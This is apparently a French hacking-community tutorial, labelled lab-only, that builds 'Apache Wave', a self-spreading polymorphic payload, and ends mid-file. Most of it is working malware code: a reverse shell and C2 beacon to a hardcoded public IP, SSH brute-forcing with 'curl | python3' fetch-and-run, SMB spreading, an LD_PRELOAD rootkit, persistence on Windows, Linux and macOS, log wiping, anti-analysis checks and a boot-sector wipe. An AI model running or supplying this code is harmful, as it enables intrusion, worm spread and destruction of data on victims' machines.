⚖️ Charte Éthique Apache
Yo, Apache membre ! Voici Apache Wave, par Platon-y pour pctamalou.fr. Ce tuto crée un payload polymorphique en Cython avec rootkit userland, évasion EDR, auto-propagation, et C2 centralisé en lab éthique. Lab uniquement – interdiction d’attaquer des systèmes réels sans autorisation (article 323-1 Code pénal : 7 ans prison, 100 000 € amende). Sensibilisation à la sécurité, pas d’usage illégal ! Hackez propre !
Apache Wave 🐍💾
Exclusivité membres : créez Apache Wave, un payload polymorphique en Cython avec rootkit, évasion EDR, auto-propagation (SSH/SMB), backdoors furtives, et C2 centralisé en lab éthique. Devenez une légende Red Team ! 100% éthique ! ⚡️
🔰 Pour les Novices : Vocabulaire de Hacker
👉 Bienvenue, jeune Apache ! Ce tuto t’apprend à créer un payloadUn mini-programme qui s’exécute sur une machine cible, comme un ninja infiltré ! en lab sécurisé. Voici les bases :
Lexique du Cyber-Nomade
Pourquoi Cython ? C’est Python, mais compilé en C pour être ultra-rapide et furtif, parfait pour un payload ninja.
Propagation réseau ? Imagine un radar : le payload scanne le réseau, trouve des machines vulnérables (via SSH ou SMB), et les infecte automatiquement.
1️⃣ Introduction à Apache Wave 🐍
Apache Wave est un payload polymorphique en Cython inspiré par Platon-y (pctamalou.fr). Ce tuto simule une attaque APT en lab avec polymorphisme, rootkit userland, évasion EDR, auto-propagation, et C2 centralisé. Lab-only, pas d’attaques réelles.
/\
/ \
/____\
| 刀 | Apache Wave
| 龍 | サイバー侍
|____|
Objectifs
- Créer un payload polymorphique avec moteur métamorphique.
- Implémenter rootkit userland pour furtivité.
- Propager via SSH/SMB et scanner ARP/ICMP.
- Éviter EDR avec faux SSL, anti-sandbox, et cleanup.
- Centraliser les cibles via dashboard Flask.
- Maîtriser OPSEC (logs, self-destruct, anti-rétro).
🏗 Architecture d’Apache Wave
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
👉 Apache Wave fonctionne comme un dragon cybernétique : il scanne, s’infiltre, et contrôle en silence.
[ Votre PC (Kali) ]
│
▼
[ Machine Victime ] ← (Scan + Infection)
│
▼
[ Backdoor Ouverte ] → (Contrôle à distance)
Schéma:
graph TD
A[Kali : Attaquant] -->|Scan ARP/ICMP| B[Victime]
B -->|Infection SSH/SMB| C[Backdoor]
C -->|Reverse Shell| D[C2 Dashboard]
Explication:
- Scan: Cherche des machines comme un radar.
- Infection: Envoie le payload via SSH ou SMB.
- Backdoor: Ouvre une porte secrète pour revenir.
- C2: Contrôle tout depuis un dashboard web.
2️⃣ Setup du Lab 🔧
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Configurez un lab isolé pour tester Apache Wave en sécurité.
📥 Installation pour Débutants
👉 On utilise Kali Linux, un système pour hackers éthiques.
- Télécharge Kali: kali.org. Installe dans VirtualBox (virtualbox.org).
- Ouvre un terminal: C’est ta console de hacker !
- Installe les dépendances:
sudo apt update sudo apt install -y python3-pip cython gcc nmap scapy paramiko suricata pip3 install cryptography requests scikit-learn psutil flask flask-socketio pika
- Crée un dossier:
mkdir apache_wave cd apache_wave
+-----------------------------------------------+
| [Lab Isolé : 172.16.0.0/24] |
| | |
| v |
| [Kali : 172.16.0.101] (C2, Apache Wave) |
| | |
| [DMZ : 172.16.1.0/24] (Web, WAF) |
| | |
| [Interne : 172.16.2.0/24] (DC, Clients) |
| | |
| [Honeypot : 172.16.3.0/24] (Canary Tokens) |
+-----------------------------------------------+
Variables
# ~/.bashrc
export KALI_IP=172.16.0.101
export TARGET_SUBNET=172.16.0.0/24
export C2_PORT=443
export LHOST=172.16.0.101
export BACKDOOR_IP=123.231.132.213
export BACKDOOR_PORT=31337
export DISCORD_WEBHOOK="YOUR_DISCORD_WEBHOOK_URL"
source ~/.bashrc
Matériel & Logiciels
| Composant | Description | Prix (approx.) |
|---|---|---|
| PC | VirtualBox, Kali 2024.4 VM | - |
| Réseau | VirtualBox NAT Network | - |
| Logiciels | Python 3.12, Cython, Flask, cryptography, paramiko, scapy, sqlite3 | Gratuit |
| Raspberry Pi (optionnel) | Lab nomade | 60 € |
Configuration Réseau
# Kali
sudo ifconfig eth0 $KALI_IP netmask 255.255.255.0 up
# Cible (Ubuntu)
sudo ifconfig eth0 172.16.0.102 netmask 255.255.255.0 up
# Cible (Windows)
netsh interface ip set address name="Ethernet" static 172.16.0.102 255.255.255.0
# Cible (macOS)
sudo ifconfig en0 inet 172.16.0.102 netmask 255.255.255.0
3️⃣ Core Payload 🛠️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Payload principal en Cython, le cœur d’Apache Wave.
Pas-à-pas:
- Copie le code dans
wave_core.pyx. - Crée
setup.py. - Compile avec les commandes ci-dessous.
# wave_core.pyx
import socket
import threading
import random
import time
import base64
import os
import platform
import scapy.all as scapy
import requests
import sqlite3
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from typing import List, Dict
# Config
cdef str C2_IP = "172.16.0.101"
cdef int C2_PORT = 443
cdef str TARGET_SUBNET = "172.16.0.0/24"
cdef str BACKDOOR_IP = "123.231.132.213"
cdef int BACKDOOR_PORT = 31337
cdef int SLEEP_MIN = 30
cdef int SLEEP_MAX = 90
cdef class ApacheWave:
cdef public str shared_key
cdef public list targets
cdef public dict defenses
cdef public str mutated_code
def __init__(self):
self.shared_key = ""
self.targets = []
self.defenses = {"ids": False, "edr": False, "waf": False}
self.mutated_code = ""
self.init_ecdh()
cpdef init_ecdh(self):
private_key = ec.generate_private_key(ec.SECP384R1())
public_key = private_key.public_key()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((C2_IP, C2_PORT))
sock.send(public_key.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo))
server_pub_key = serialization.load_pem_public_key(sock.recv(4096))
self.shared_key = private_key.exchange(ec.ECDH(), server_pub_key).hex()
sock.close()
cpdef str aes_encrypt(self, str data):
cipher = AES.new(self.shared_key.ljust(32)[:32].encode(), AES.MODE_CBC, b"ApacheWave2025!!")
return base64.b64encode(cipher.encrypt(pad(data.encode(), AES.block_size))).decode()
cpdef str aes_decrypt(self, str data):
cipher = AES.new(self.shared_key.ljust(32)[:32].encode(), AES.MODE_CBC, b"ApacheWave2025!!")
return unpad(cipher.decrypt(base64.b64decode(data)), AES.block_size).decode()
cpdef mutate_code(self):
import ast
import inspect
src = inspect.getsource(self.__class__)
tree = ast.parse(src)
for node in ast.walk(tree):
if isinstance(node, ast.Name):
node.id = f"var_{random.randint(0, 1000)}"
self.mutated_code = ast.unparse(tree)
cpdef scan_network(self):
ans, _ = scapy.arping(TARGET_SUBNET, timeout=2, verbose=False)
for _, r in ans.res:
ip = r.psrc
mac = r.hwsrc
os_type = self.guess_os(r)
self.targets.append({"ip": ip, "mac": mac, "os": os_type})
self.report_to_c2(ip, mac, os_type)
cpdef str guess_os(self, pkt):
if "Windows" in str(pkt):
return "Windows"
elif "Linux" in str(pkt):
return "Linux"
else:
return "Unknown"
cpdef report_to_c2(self, str ip, str mac, str os_type):
conn = sqlite3.connect("victims.db")
conn.execute("CREATE TABLE IF NOT EXISTS victims (ip TEXT, mac TEXT, os TEXT, last_seen TEXT)")
conn.execute("INSERT INTO victims VALUES (?, ?, ?, datetime('now'))", (ip, mac, os_type))
conn.commit()
conn.close()
requests.post(f"https://{C2_IP}/log", json={"ip": ip, "mac": mac, "os": os_type}, verify=False)
cpdef main(self):
print("Invoquant l’esprit du dragon Apache...")
self.mutate_code()
self.scan_network()
for target in self.targets:
self.propagate(target["ip"])
self.install_backdoor()
while True:
self.send_heartbeat()
time.sleep(random.randint(SLEEP_MIN, SLEEP_MAX))
cpdef send_heartbeat(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((C2_IP, C2_PORT))
sock.send(self.aes_encrypt("Heartbeat").encode())
sock.close()
# setup.py
from setuptools import setup
from Cython.Build import cythonize
setup(
name="apache_wave",
ext_modules=cythonize("wave_core.pyx"),
zip_safe=False,
)
# Compiler python3 setup.py build_ext --inplace # Obfusquer pip3 install pyarmor pyarmor pack --clean --output dist/wave --with-license outer --obfuscate-mode des --platform linux.x86_64,windows.x86_64 wave_core.py
4️⃣ Polymorphisme 🔄
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Moteur métamorphique pour muter le code, comme un caméléon.
# metamorphic_engine.py
import ast
import inspect
import random
def mutate_code(src: str) -> str:
tree = ast.parse(src)
for node in ast.walk(tree):
if isinstance(node, ast.Name):
node.id = f"var_{random.randint(0, 1000)}"
elif isinstance(node, ast.FunctionDef):
node.name = f"func_{random.randint(0, 1000)}"
return ast.unparse(tree)
5️⃣ Évasion EDR 🕵️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Faux Trafic SSL
Imite TLS 1.3 pour éviter DPI.
# ssl_mimic.py
import ssl
import socket
def mimic_tls(host: str, port: int):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_3)
sock = context.wrap_socket(socket.socket(socket.AF_INET), server_hostname=host)
sock.connect((host, port))
sock.send(b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n\r\n")
sock.close()
Anti-Sandbox
# anti_analysis.py
import os
import subprocess
import hashlib
import time
def is_sandboxed():
return any([
os.getenv("VIRTUAL_ENV"),
"docker" in open("/proc/self/cgroup").read() if os.path.exists("/proc/self/cgroup") else False,
"vbox" in subprocess.getoutput("lspci"),
"wireshark" in subprocess.getoutput("ps aux")
])
def check_activation():
hostname = socket.gethostname()
hash_time = hashlib.sha256(hostname.encode()).hexdigest()
if int(hash_time, 16) % 3600 != int(time.time()) % 3600:
exit()
def self_destruct():
if is_sandboxed():
os.system("rm -rf /tmp/wave.py && dd if=/dev/zero of=/dev/sda bs=512 count=1" if platform.system() != "Windows" else "del /F /Q C:\\Temp\\wave.py")
exit()
check_activation()
self_destruct()
Cleanup Logs
# cleanup.sh # Linux echo "" > /var/log/syslog && history -c # Windows wevtutil cl System && wevtutil cl Security
6️⃣ Rootkit Furtif 🛠️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Userland Rootkit (Linux)
// hook_syscall.c
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
#include <string.h>
int (*original_execve)(const char*, char* const*, char* const*);
__attribute__((constructor)) void init() {
original_execve = dlsym(RTLD_NEXT, "execve");
}
int execve(const char *path, char *const argv[], char *const envp[]) {
if (strstr(path, "wave")) return -1;
return original_execve(path, argv, envp);
}
# Compiler gcc -shared -fPIC hook_syscall.c -o libhook.so -ldl # Activer export LD_PRELOAD=/tmp/libhook.so
Bootkit Persistance
# Windows VBScript
echo Set WShell = CreateObject("WScript.Shell") > C:\Temp\boot.vbs
echo WShell.Run "python C:\Temp\wave.py", 0 >> C:\Temp\boot.vbs
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v BootWave /t REG_SZ /d "wscript C:\Temp\boot.vbs"
# Linux Initrd
echo "python3 /tmp/wave.py &" >> /boot/initramfs-custom
7️⃣ Auto-Propagation 📡
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
# propagation.py
import paramiko
import smbclient
import os
def ssh_bruteforce(target_ip, username="root", wordlist="/usr/share/wordlists/rockyou.txt"):
with open(wordlist, "r", errors="ignore") as f:
for password in f.readlines():
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target_ip, username=username, password=password.strip(), timeout=3)
ssh.exec_command(f"curl https://{C2_IP}/wave.py | python3 -")
ssh.close()
return True
except:
pass
return False
def smb_exploit(target_ip):
try:
smbclient.connect(target_ip, username="admin", password="password")
smbclient.put("wave.py", "C:\\Windows\\Temp\\wave.py")
smbclient.close()
return True
except:
return False
8️⃣ Backdoor Persistante 🔄
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
# backdoor.py
import socket
import os
import platform
import subprocess
import time
def install_backdoor():
if platform.system() == "Windows":
os.system('reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d "python C:\\Windows\\Temp\\wave.py"')
else:
os.system("(crontab -l 2>/dev/null; echo '@reboot python3 /tmp/.wave.py') | crontab -")
def reverse_shell():
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((BACKDOOR_IP, BACKDOOR_PORT))
while True:
cmd = s.recv(1024).decode()
if cmd == "exit":
break
output = subprocess.getoutput(cmd)
s.send(output.encode())
s.close()
except:
time.sleep(60)
install_backdoor()
reverse_shell()
9️⃣ Scanner Réseau 📡
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
# scanner.py
import scapy.all as scapy
import requests
def scan_network(subnet="172.16.0.0/24"):
ans, _ = scapy.arping(subnet, timeout=2, verbose=False)
for _, r in ans.res:
ip = r.psrc
mac = r.hwsrc
os_type = guess_os(r)
send_to_c2(ip, mac, os_type)
def guess_os(pkt):
if "Windows" in str(pkt):
return "Windows"
elif "Linux" in str(pkt):
return "Linux"
else:
return "Unknown"
def send_to_c2(ip, mac, os_type):
requests.post(f"https://{C2_IP}/log", json={"ip": ip, "mac": mac, "os": os_type}, verify=False)
🔟 C2 Dashboard 📊
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
# c2_dashboard.py
from flask import Flask, render_template, request
import sqlite3
app = Flask(__name__)
@app.route("/")
def dashboard():
conn = sqlite3.connect("victims.db")
victims = conn.execute("SELECT * FROM victims").fetchall()
conn.close()
return render_template("dashboard.html", victims=victims)
@app.route("/log", methods=["POST"])
def log():
data = request.json
conn = sqlite3.connect("victims.db")
conn.execute("INSERT INTO victims VALUES (?, ?, ?, datetime('now'))", (data["ip"], data["mac"], data["os"]))
conn.commit()
conn.close()
return "OK"
!-- dashboard.html -->
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<title>Apache Wave: サイバー侍</title>
<style>
body { background: #1a1a1a; color: #ff4500; font-family: 'Fira Code', monospace; text-align: center; }
h1 { text-shadow: 0 0 10px #ff0000; }
table { width: 80%; margin: 20px auto; border-collapse: collapse; }
th, td { border: 2px solid #ff4500; padding: 10px; color: #ffffff; }
th { background: #ff4500; color: #1a1a1a; }
.ascii-art { color: #ffffff; }
</style>
</head>
<body>
<h1>Apache Wave: サイバー侍</h1>
<pre class="ascii-art">
/\
/ \
/____\
| 刀 | Apache Wave
| 龍 | サイバー侍
|____|
</pre>
<table>
<tr><th>IP</th><th>MAC</th><th>OS</th><th>Last Seen</th></tr>
{% for victim in victims %}
<tr><td>{{ victim[0] }}</td><td>{{ victim[1] }}</td><td>{{ victim[2] }}</td><td>{{ victim[3] }}</td></tr>
{% endfor %}
</table>
</body>
</html>
# Lancer python3 c2_dashboard.py # Accéder https://$KALI_IP:443
🎯 Test en Lab
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Test en 2 Minutes
👉 Vois Apache Wave en action rapidement !
- Ouvre 2 terminaux:
- Terminal 1 (Attaquant):
python3 c2_dashboard.py
- Terminal 2 (Victime):
python3 dist/wave/wave.py
- Terminal 1 (Attaquant):
- Ouvre le dashboard: https://172.16.0.101:443 (ou
http://localhost:5000si local). - Vérifie: Les victimes apparaissent dans le tableau !
Vérification Avancée
Pour les pros, vérifie le trafic et la backdoor.
# Vérifier trafic sudo tcpdump -i eth0 -n host 172.16.0.101 and port 443 # Vérifier backdoor nc -nv 123.231.132.213 31337
1️⃣1️⃣ Sécurité Opérationnelle 🕵️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Pourquoi éviter les logs ? Les logs (journaux système) sont comme des empreintes digitales : ils enregistrent tout ce que tu fais. En prod, un admin peut les analyser et te traquer (IP, commandes, fichiers créés).
Comment se faire attraper ?
- Trafic réseau: Connexions suspectes vers 172.16.0.101:443 ou 123.231.132.213:31337.
- Fichiers: /tmp/wave.py ou C:\Temp\wave.py laissés sur la machine.
- Processus: Python ou libhook.so en cours d’exécution.
- Logs: Entrées dans /var/log/syslog ou Event Viewer (Windows).
IOC à Éviter
- Fichiers: /tmp/wave.py, C:\Temp\wave.py.
- Réseau: Trafic vers $LHOST:443, $BACKDOOR_IP:31337.
- Processus: python3 suspect, libhook.so.
- Registres: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate.
Anti-rétro-ingénierie
# anti_retro.py
import os
import sys
import psutil
def anti_debug():
if os.environ.get("DEBUG") or sys.gettrace():
exit()
for proc in psutil.process_iter(["name"]):
if "wireshark" in proc.info["name"].lower() or "ida" in proc.info["name"].lower():
exit()
anti_debug()
1️⃣2️⃣ Sécurisation 🛡️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Protégez votre réseau contre ce type de payload.
- Détection: Surveillez $LHOST:443, $BACKDOOR_IP:31337, processus Python.
- Suppression: Kill processus, supprimez /tmp/wave.py.
- Prévention: Firewall, EDR, patchs, désactiver SMBv1.
# Détection netstat -tuln | grep 443 ps aux | grep python # Suppression (Linux) kill -9 $(pidof python3 /tmp/wave.py) rm /tmp/wave.py /tmp/libhook.so # Suppression (Windows) taskkill /IM python.exe /F del C:\Temp\wave.py
1️⃣3️⃣ Rapport Pro 📊
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
## Rapport de Test Apache Wave - **Cible**: $TARGET_SUBNET - **Durée**: 4h - **Résultat**: Propagation réussie, 5 cibles infectées, backdoor active - **OS**: Windows/Linux/macOS - **Recommandations**: - Surveiller trafic réseau (ports 443, 31337) - Mettre à jour EDR - Segmenter réseau - Désactiver SMBv1
❓ FAQ Apache 🔥
Q: Je suis perdu, par où commencer ?
A: Installe Kali Linux (kali.org), ouvre un terminal, et suis le Guide Débutant.
Q: Puis-je tester en prod ?
A: Non, lab-only avec autorisation écrite, sinon 7 ans de prison (Art. 323-1 CP) !
Q: Pourquoi mon code ne compile pas ?
A: Vérifie Cython (pip3 install cython) et les dépendances (gcc, python3-dev).
Q: Propagation échoue ?
A: Vérifie SSH/SMB, firewall, et wordlist (/usr/share/wordlists/rockyou.txt).
Q: Comment savoir si ça marche ?
A: Utilise Wireshark pour voir le trafic vers 172.16.0.101:443 ou ouvre le dashboard (https://172.16.0.101:443).
Q: Détecter Apache Wave ?
A: Surveille trafic, processus Python, et logs (/var/log/syslog ou Event Viewer).
🎁 Bonus : Apache Wave 2.0 – Simplifié & Autonome 🐍🔥
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Yo, Apaches ! Voici Apache Wave 2.0, une version ultra-simplifiée pour l’utilisateur final, mais avec des scripts backstage qui déchirent. Conçu par Platon-y pour pctamalou.fr, ce payload est autonome, adaptable à n’importe quel lab, et doté d’une interface CLI avec questionnaire interactif. Parfait pour novices et pros ! 💖
Nouveautés 2.0
- Simplicité: Un seul script (
run.sh) avec questionnaire pour IP, port, subnet. - Autonomie: Détection auto de l’OS (Win 7→11, Linux 4.4→6.x, macOS 10.15→14), arch (x86_64/ARM), et réseau.
- Esthétique: ASCII art, couleurs, progress bars, dashboard cyberpunk.
Structure
/apachewave/
├── apachewave.py # Point d’entrée avec questionnaire
├── wave_core.pyx # Payload principal
├── setup.py # Compilation Cython
├── config.ini # Config dynamique
├── autoinstall.sh # Installation auto
├── run.sh # Lancement user-friendly
├── healthcheck.py # Diagnostic système
├── core/
│ ├── polymorphic_engine.py # Mutation du code
│ ├── smart_scanner.py # Scan adaptatif
│ └── persistence/
│ ├── windows.py # Persistance Windows
│ ├── linux.py # Persistance Linux
│ ├── macos.py # Persistance macOS
│ └── __init__.py # Gestion persistance
├── evasion/
│ ├── memory_injection.py # Injection mémoire
│ └── syscall_hooking.c # Hook syscall
└── README.md # Instructions
1️⃣ apachewave.py – Point d’Entrée
Questionnaire interactif et interface CLI avec ASCII art, couleurs, et progress bars.
# apachewave.py
import argparse
import os
import sys
import platform
import time
import configparser
from colorama import init, Fore, Style
import core
from tqdm import tqdm
init(autoreset=True) # Colorama pour couleurs CLI
# ASCII Art
def print_banner():
print(Fore.RED + r"""
_____
/ _ \ ______ ______
/ /_\ \\____ \\____ \\
\ \_/ \ |_> \ |_> \
\_____ / __/ ___/
\/|__| \/
Apache Wave 2.0 - Cyber-Nomade
""")
print(Fore.YELLOW + "⚠️ LAB ONLY - Article 323-1 Code pénal : 7 ans prison, 100 000 € amende")
print(Fore.CYAN + "By Platon-y for pctamalou.fr 💖\n")
# Questionnaire interactif
def setup_config():
config = configparser.ConfigParser()
config['C2'] = {}
config['Target'] = {}
config['Security'] = {}
print(Fore.GREEN + "[+] Configuration initiale d'Apache Wave")
print(Fore.YELLOW + "Laissez vide pour utiliser les valeurs par défaut.\n")
# IP C2
default_ip = "172.16.0.101" if "debug" not in sys.argv else "127.0.0.1"
c2_ip = input(Fore.CYAN + f"IP du C2 [{default_ip}]: ") or default_ip
config['C2']['ip'] = c2_ip
# Port C2
c2_port = input(Fore.CYAN + "Port du C2 [443]: ") or "443"
config['C2']['port'] = c2_port
# Subnet cible
default_subnet = core.smart_scanner.detect_subnet() or "172.16.0.0/24"
subnet = input(Fore.CYAN + f"Subnet cible [{default_subnet}]: ") or default_subnet
config['Target']['subnet'] = subnet
# Mode debug
debug = input(Fore.CYAN + "Activer mode debug ? [y/N]: ").lower() == "y"
config['C2']['debug'] = str(debug)
# Clé AES
import secrets
default_key = secrets.token_hex(16) # Clé AES-256 aléatoire
key = input(Fore.CYAN + f"Clé AES (16+ chars) [{default_key[:8]}...]: ") or default_key
config['Security']['key'] = key
# Sauvegarde config
with open("config.ini", "w") as configfile:
config.write(configfile)
print(Fore.GREEN + "\n[+] Configuration sauvegardée dans config.ini\n")
# Barre de progression
def show_progress(task, duration=3):
print(Fore.CYAN + f"[+] {task}")
for _ in tqdm(range(100), bar_format="{l_bar}{bar}| {n_fmt}%", ncols=70):
time.sleep(duration / 100)
print(Fore.GREEN + f"[+] {task} terminé !\n")
# Main
if __name__ == "__main__":
print_banner()
parser = argparse.ArgumentParser(description="Apache Wave 2.0")
parser.add_argument("--demo", action="store_true", help="Mode démo sécurisé")
parser.add_argument("--scan", action="store_true", help="Scan rapide")
parser.add_argument("--persist", help="OS cible pour persistance (win/linux/mac)")
args = parser.parse_args()
# Vérifie config.ini
if not os.path.exists("config.ini"):
setup_config()
else:
print(Fore.YELLOW + "[+] Config existante trouvée. Modifier ? [y/N]: ", end="")
if input().lower() == "y":
setup_config()
# Vérifie santé système
show_progress("Vérification système")
os.system("python3 healthcheck.py")
if args.demo:
show_progress("Lancement mode démo")
core.run_demo_mode()
elif args.scan:
show_progress("Lancement scan rapide")
core.smart_scanner.scan_network()
elif args.persist:
show_progress(f"Installation persistance ({args.persist})")
core.persistence.install(args.persist)
else:
show_progress("Déploiement Apache Wave")
core.main()
2️⃣ wave_core.pyx – Payload Principal
Optimisé, universel, et autonome.
# wave_core.pyx
import os
import sys
import platform
import socket
import ssl
import time
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import configparser
from core import polymorphic_engine, smart_scanner, persistence
# Charge config
config = configparser.ConfigParser()
config.read("config.ini")
C2_IP = config['C2']['ip']
C2_PORT = int(config['C2']['port'])
KEY = config['Security']['key'].encode()[:32] # AES-256
DEBUG = config['C2'].getboolean('debug')
# Détection OS/Version
def detect_env():
os_name = platform.system()
os_release = platform.release()
arch = platform.machine().lower()
if os_name == "Windows":
win_ver = {
'10': 'Windows 10/11',
'6.3': 'Windows 8.1',
'6.2': 'Windows 8',
'6.1': 'Windows 7'
}.get(os_release.split('.')[0], f"Windows {os_release}")
return f"win_{arch}_{os_release.split('.')[0]}"
elif os_name == "Linux":
return f"linux_{arch}_{os_release.split('.')[0]}"
elif os_name == "Darwin":
return f"mac_{arch}_{platform.mac_ver()[0].split('.')[0]}"
# Chiffrement
def aes_encrypt(data: str) -> str:
cipher = AES.new(KEY, AES.MODE_CBC, iv=KEY[:16])
return base64.b64encode(cipher.encrypt(pad(data.encode(), AES.block_size))).decode()
def aes_decrypt(data: str) -> str:
cipher = AES.new(KEY, AES.MODE_CBC, iv=KEY[:16])
return unpad(cipher.decrypt(base64.b64decode(data)), AES.block_size).decode()
# Communication C2
def beacon():
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
while True:
try:
with socket.create_connection((C2_IP, C2_PORT)) as sock:
with context.wrap_socket(sock, server_hostname=C2_IP) as ssock:
ssock.send(aes_encrypt(detect_env()))
while True:
cmd = aes_decrypt(ssock.recv(1024).decode())
if cmd == "exit":
return
if "rm -rf" in cmd.lower():
output = "COMMAND BLOCKED"
else:
output = os.popen(cmd).read()
ssock.send(aes_encrypt(output))
except:
time.sleep(60)
# Main
def main():
env = detect_env()
polymorphic_engine.mutate_code() # Polymorphisme
persistence.install(env.split('_')[0]) # Persistance
smart_scanner.scan_network(config['Target']['subnet']) # Scan
beacon() # Communication C2
def run_demo_mode():
print("Mode démo : Scan sans persistance ni C2")
smart_scanner.scan_network(config['Target']['subnet'])
3️⃣ setup.py – Compilation
# setup.py
from setuptools import setup
from Cython.Build import cythonize
setup(
name="apache_wave",
ext_modules=cythonize("wave_core.pyx"),
zip_safe=False,
)
4️⃣ config.ini – Configuration
[C2]
ip = 172.16.0.101
port = 443
debug = False
[Target]
subnet = 172.16.0.0/24
[Security]
key = ApacheWave2024!!
5️⃣ autoinstall.sh – Installation Auto
#!/bin/bash
echo -e "\e[32m[+] Installation des dépendances...\e[0m"
sudo apt update && sudo apt install -y python3-pip cython gcc nmap
pip3 install pycryptodome colorama tqdm configparser > /dev/null
echo -e "\e[32m[+] Compilation...\e[0m"
python3 setup.py build_ext --inplace > /dev/null 2>&1
echo -e "\e[32m[+] Prêt ! Lancez avec ./run.sh ou python3 apachewave.py\e[0m"
chmod +x run.sh
6️⃣ run.sh – Lancement Stylé
#!/bin/bash
echo -e "\e[31m
_____
/ _ \ ______ ______
/ /_\ \\____ \\____ \\
\ \_/ \ |_> \ |_> \
\_____ / __/ ___/
\/|__| \/
Apache Wave 2.0 - Cyber-Nomade
\e[0m"
echo -e "\e[33m⚠️ LAB ONLY - Article 323-1 : 7 ans prison, 100 000 € amende\e[0m"
echo -e "\e[32m[+] Lancement...\e[0m"
python3 apachewave.py "$@"
7️⃣ healthcheck.py – Diagnostic
# healthcheck.py
import socket
import os
import sys
from colorama import init, Fore
init(autoreset=True)
def check_ports(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((ip, port))
sock.close()
return result == 0
def check_deps():
deps = ["pycryptodome", "colorama", "tqdm", "configparser"]
missing = []
for dep in deps:
try:
__import__(dep)
except ImportError:
missing.append(dep)
return missing
def check_network():
try:
socket.gethostbyname("google.com")
return True
except:
return False
def run_checks():
print(Fore.CYAN + "[+] Diagnostic système")
config = open("config.ini").read()
ip = config.split("ip = ")[1].split("\n")[0]
port = int(config.split("port = ")[1].split("\n")[0])
# Ports
if check_ports(ip, port):
print(Fore.GREEN + f"[+] Port {port} ouvert sur {ip}")
else:
print(Fore.RED + f"[-] Port {port} fermé sur {ip}")
# Dépendances
missing = check_deps()
if not missing:
print(Fore.GREEN + "[+] Toutes dépendances installées")
else:
print(Fore.RED + f"[-] Dépendances manquantes : {', '.join(missing)}")
# Réseau
if check_network():
print(Fore.GREEN + "[+] Connexion réseau OK")
else:
print(Fore.RED + "[-] Pas de connexion réseau")
if __name__ == "__main__":
run_checks()
8️⃣ core/polymorphic_engine.py – Polymorphisme
# core/polymorphic_engine.py
import ast
import random
def mutate_code():
src = open("wave_core.pyx").read()
tree = ast.parse(src)
for node in ast.walk(tree):
if isinstance(node, ast.Name):
node.id = f"var_{random.randint(0, 1000)}"
elif isinstance(node, ast.FunctionDef):
node.name = f"func_{random.randint(0, 1000)}"
with open("wave_core_mutated.py", "w") as f:
f.write(ast.unparse(tree))
9️⃣ core/smart_scanner.py – Scan Adaptatif
# core/smart_scanner.py
import subprocess
import socket
import configparser
def detect_subnet():
try:
output = subprocess.getoutput("ip route")
for line in output.split("\n"):
if "default" not in line:
return line.split()[0]
except:
return None
def scan_network(subnet):
print(f"[+] Scan réseau : {subnet}")
try:
output = subprocess.getoutput(f"nmap -sn {subnet}")
print(output)
except:
print("[-] Scan échoué. Vérifiez nmap.")
🔟 core/persistence/windows.py – Persistance Windows
# core/persistence/windows.py
import os
import sys
def install(os_type):
env = os.popen("systeminfo").read()
if "2019" in env or "10" in env:
os.system("wmic /namespace:\\\\root\\subscription PATH __EventFilter CREATE Name='ApacheFilter'")
else:
os.system(f'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ApacheUpdate /t REG_SZ /d "{sys.argv[0]}"')
1️⃣1️⃣ core/persistence/linux.py – Persistance Linux
# core/persistence/linux.py
import os
import sys
import platform
def install(os_type):
if "arm" in platform.machine().lower():
os.system(f"echo '@reboot nohup python3 {sys.argv[0]} &' | crontab -")
else:
os.system(f"(crontab -l 2>/dev/null; echo '@reboot python3 {sys.argv[0]}') | crontab -")
1️⃣2️⃣ core/persistence/macos.py – Persistance macOS
# core/persistence/macos.py
import os
import sys
def install(os_type):
plist = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apache.wave</string>
<key>ProgramArguments</key>
<array>
<string>python3</string>
<string>{sys.argv[0]}</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
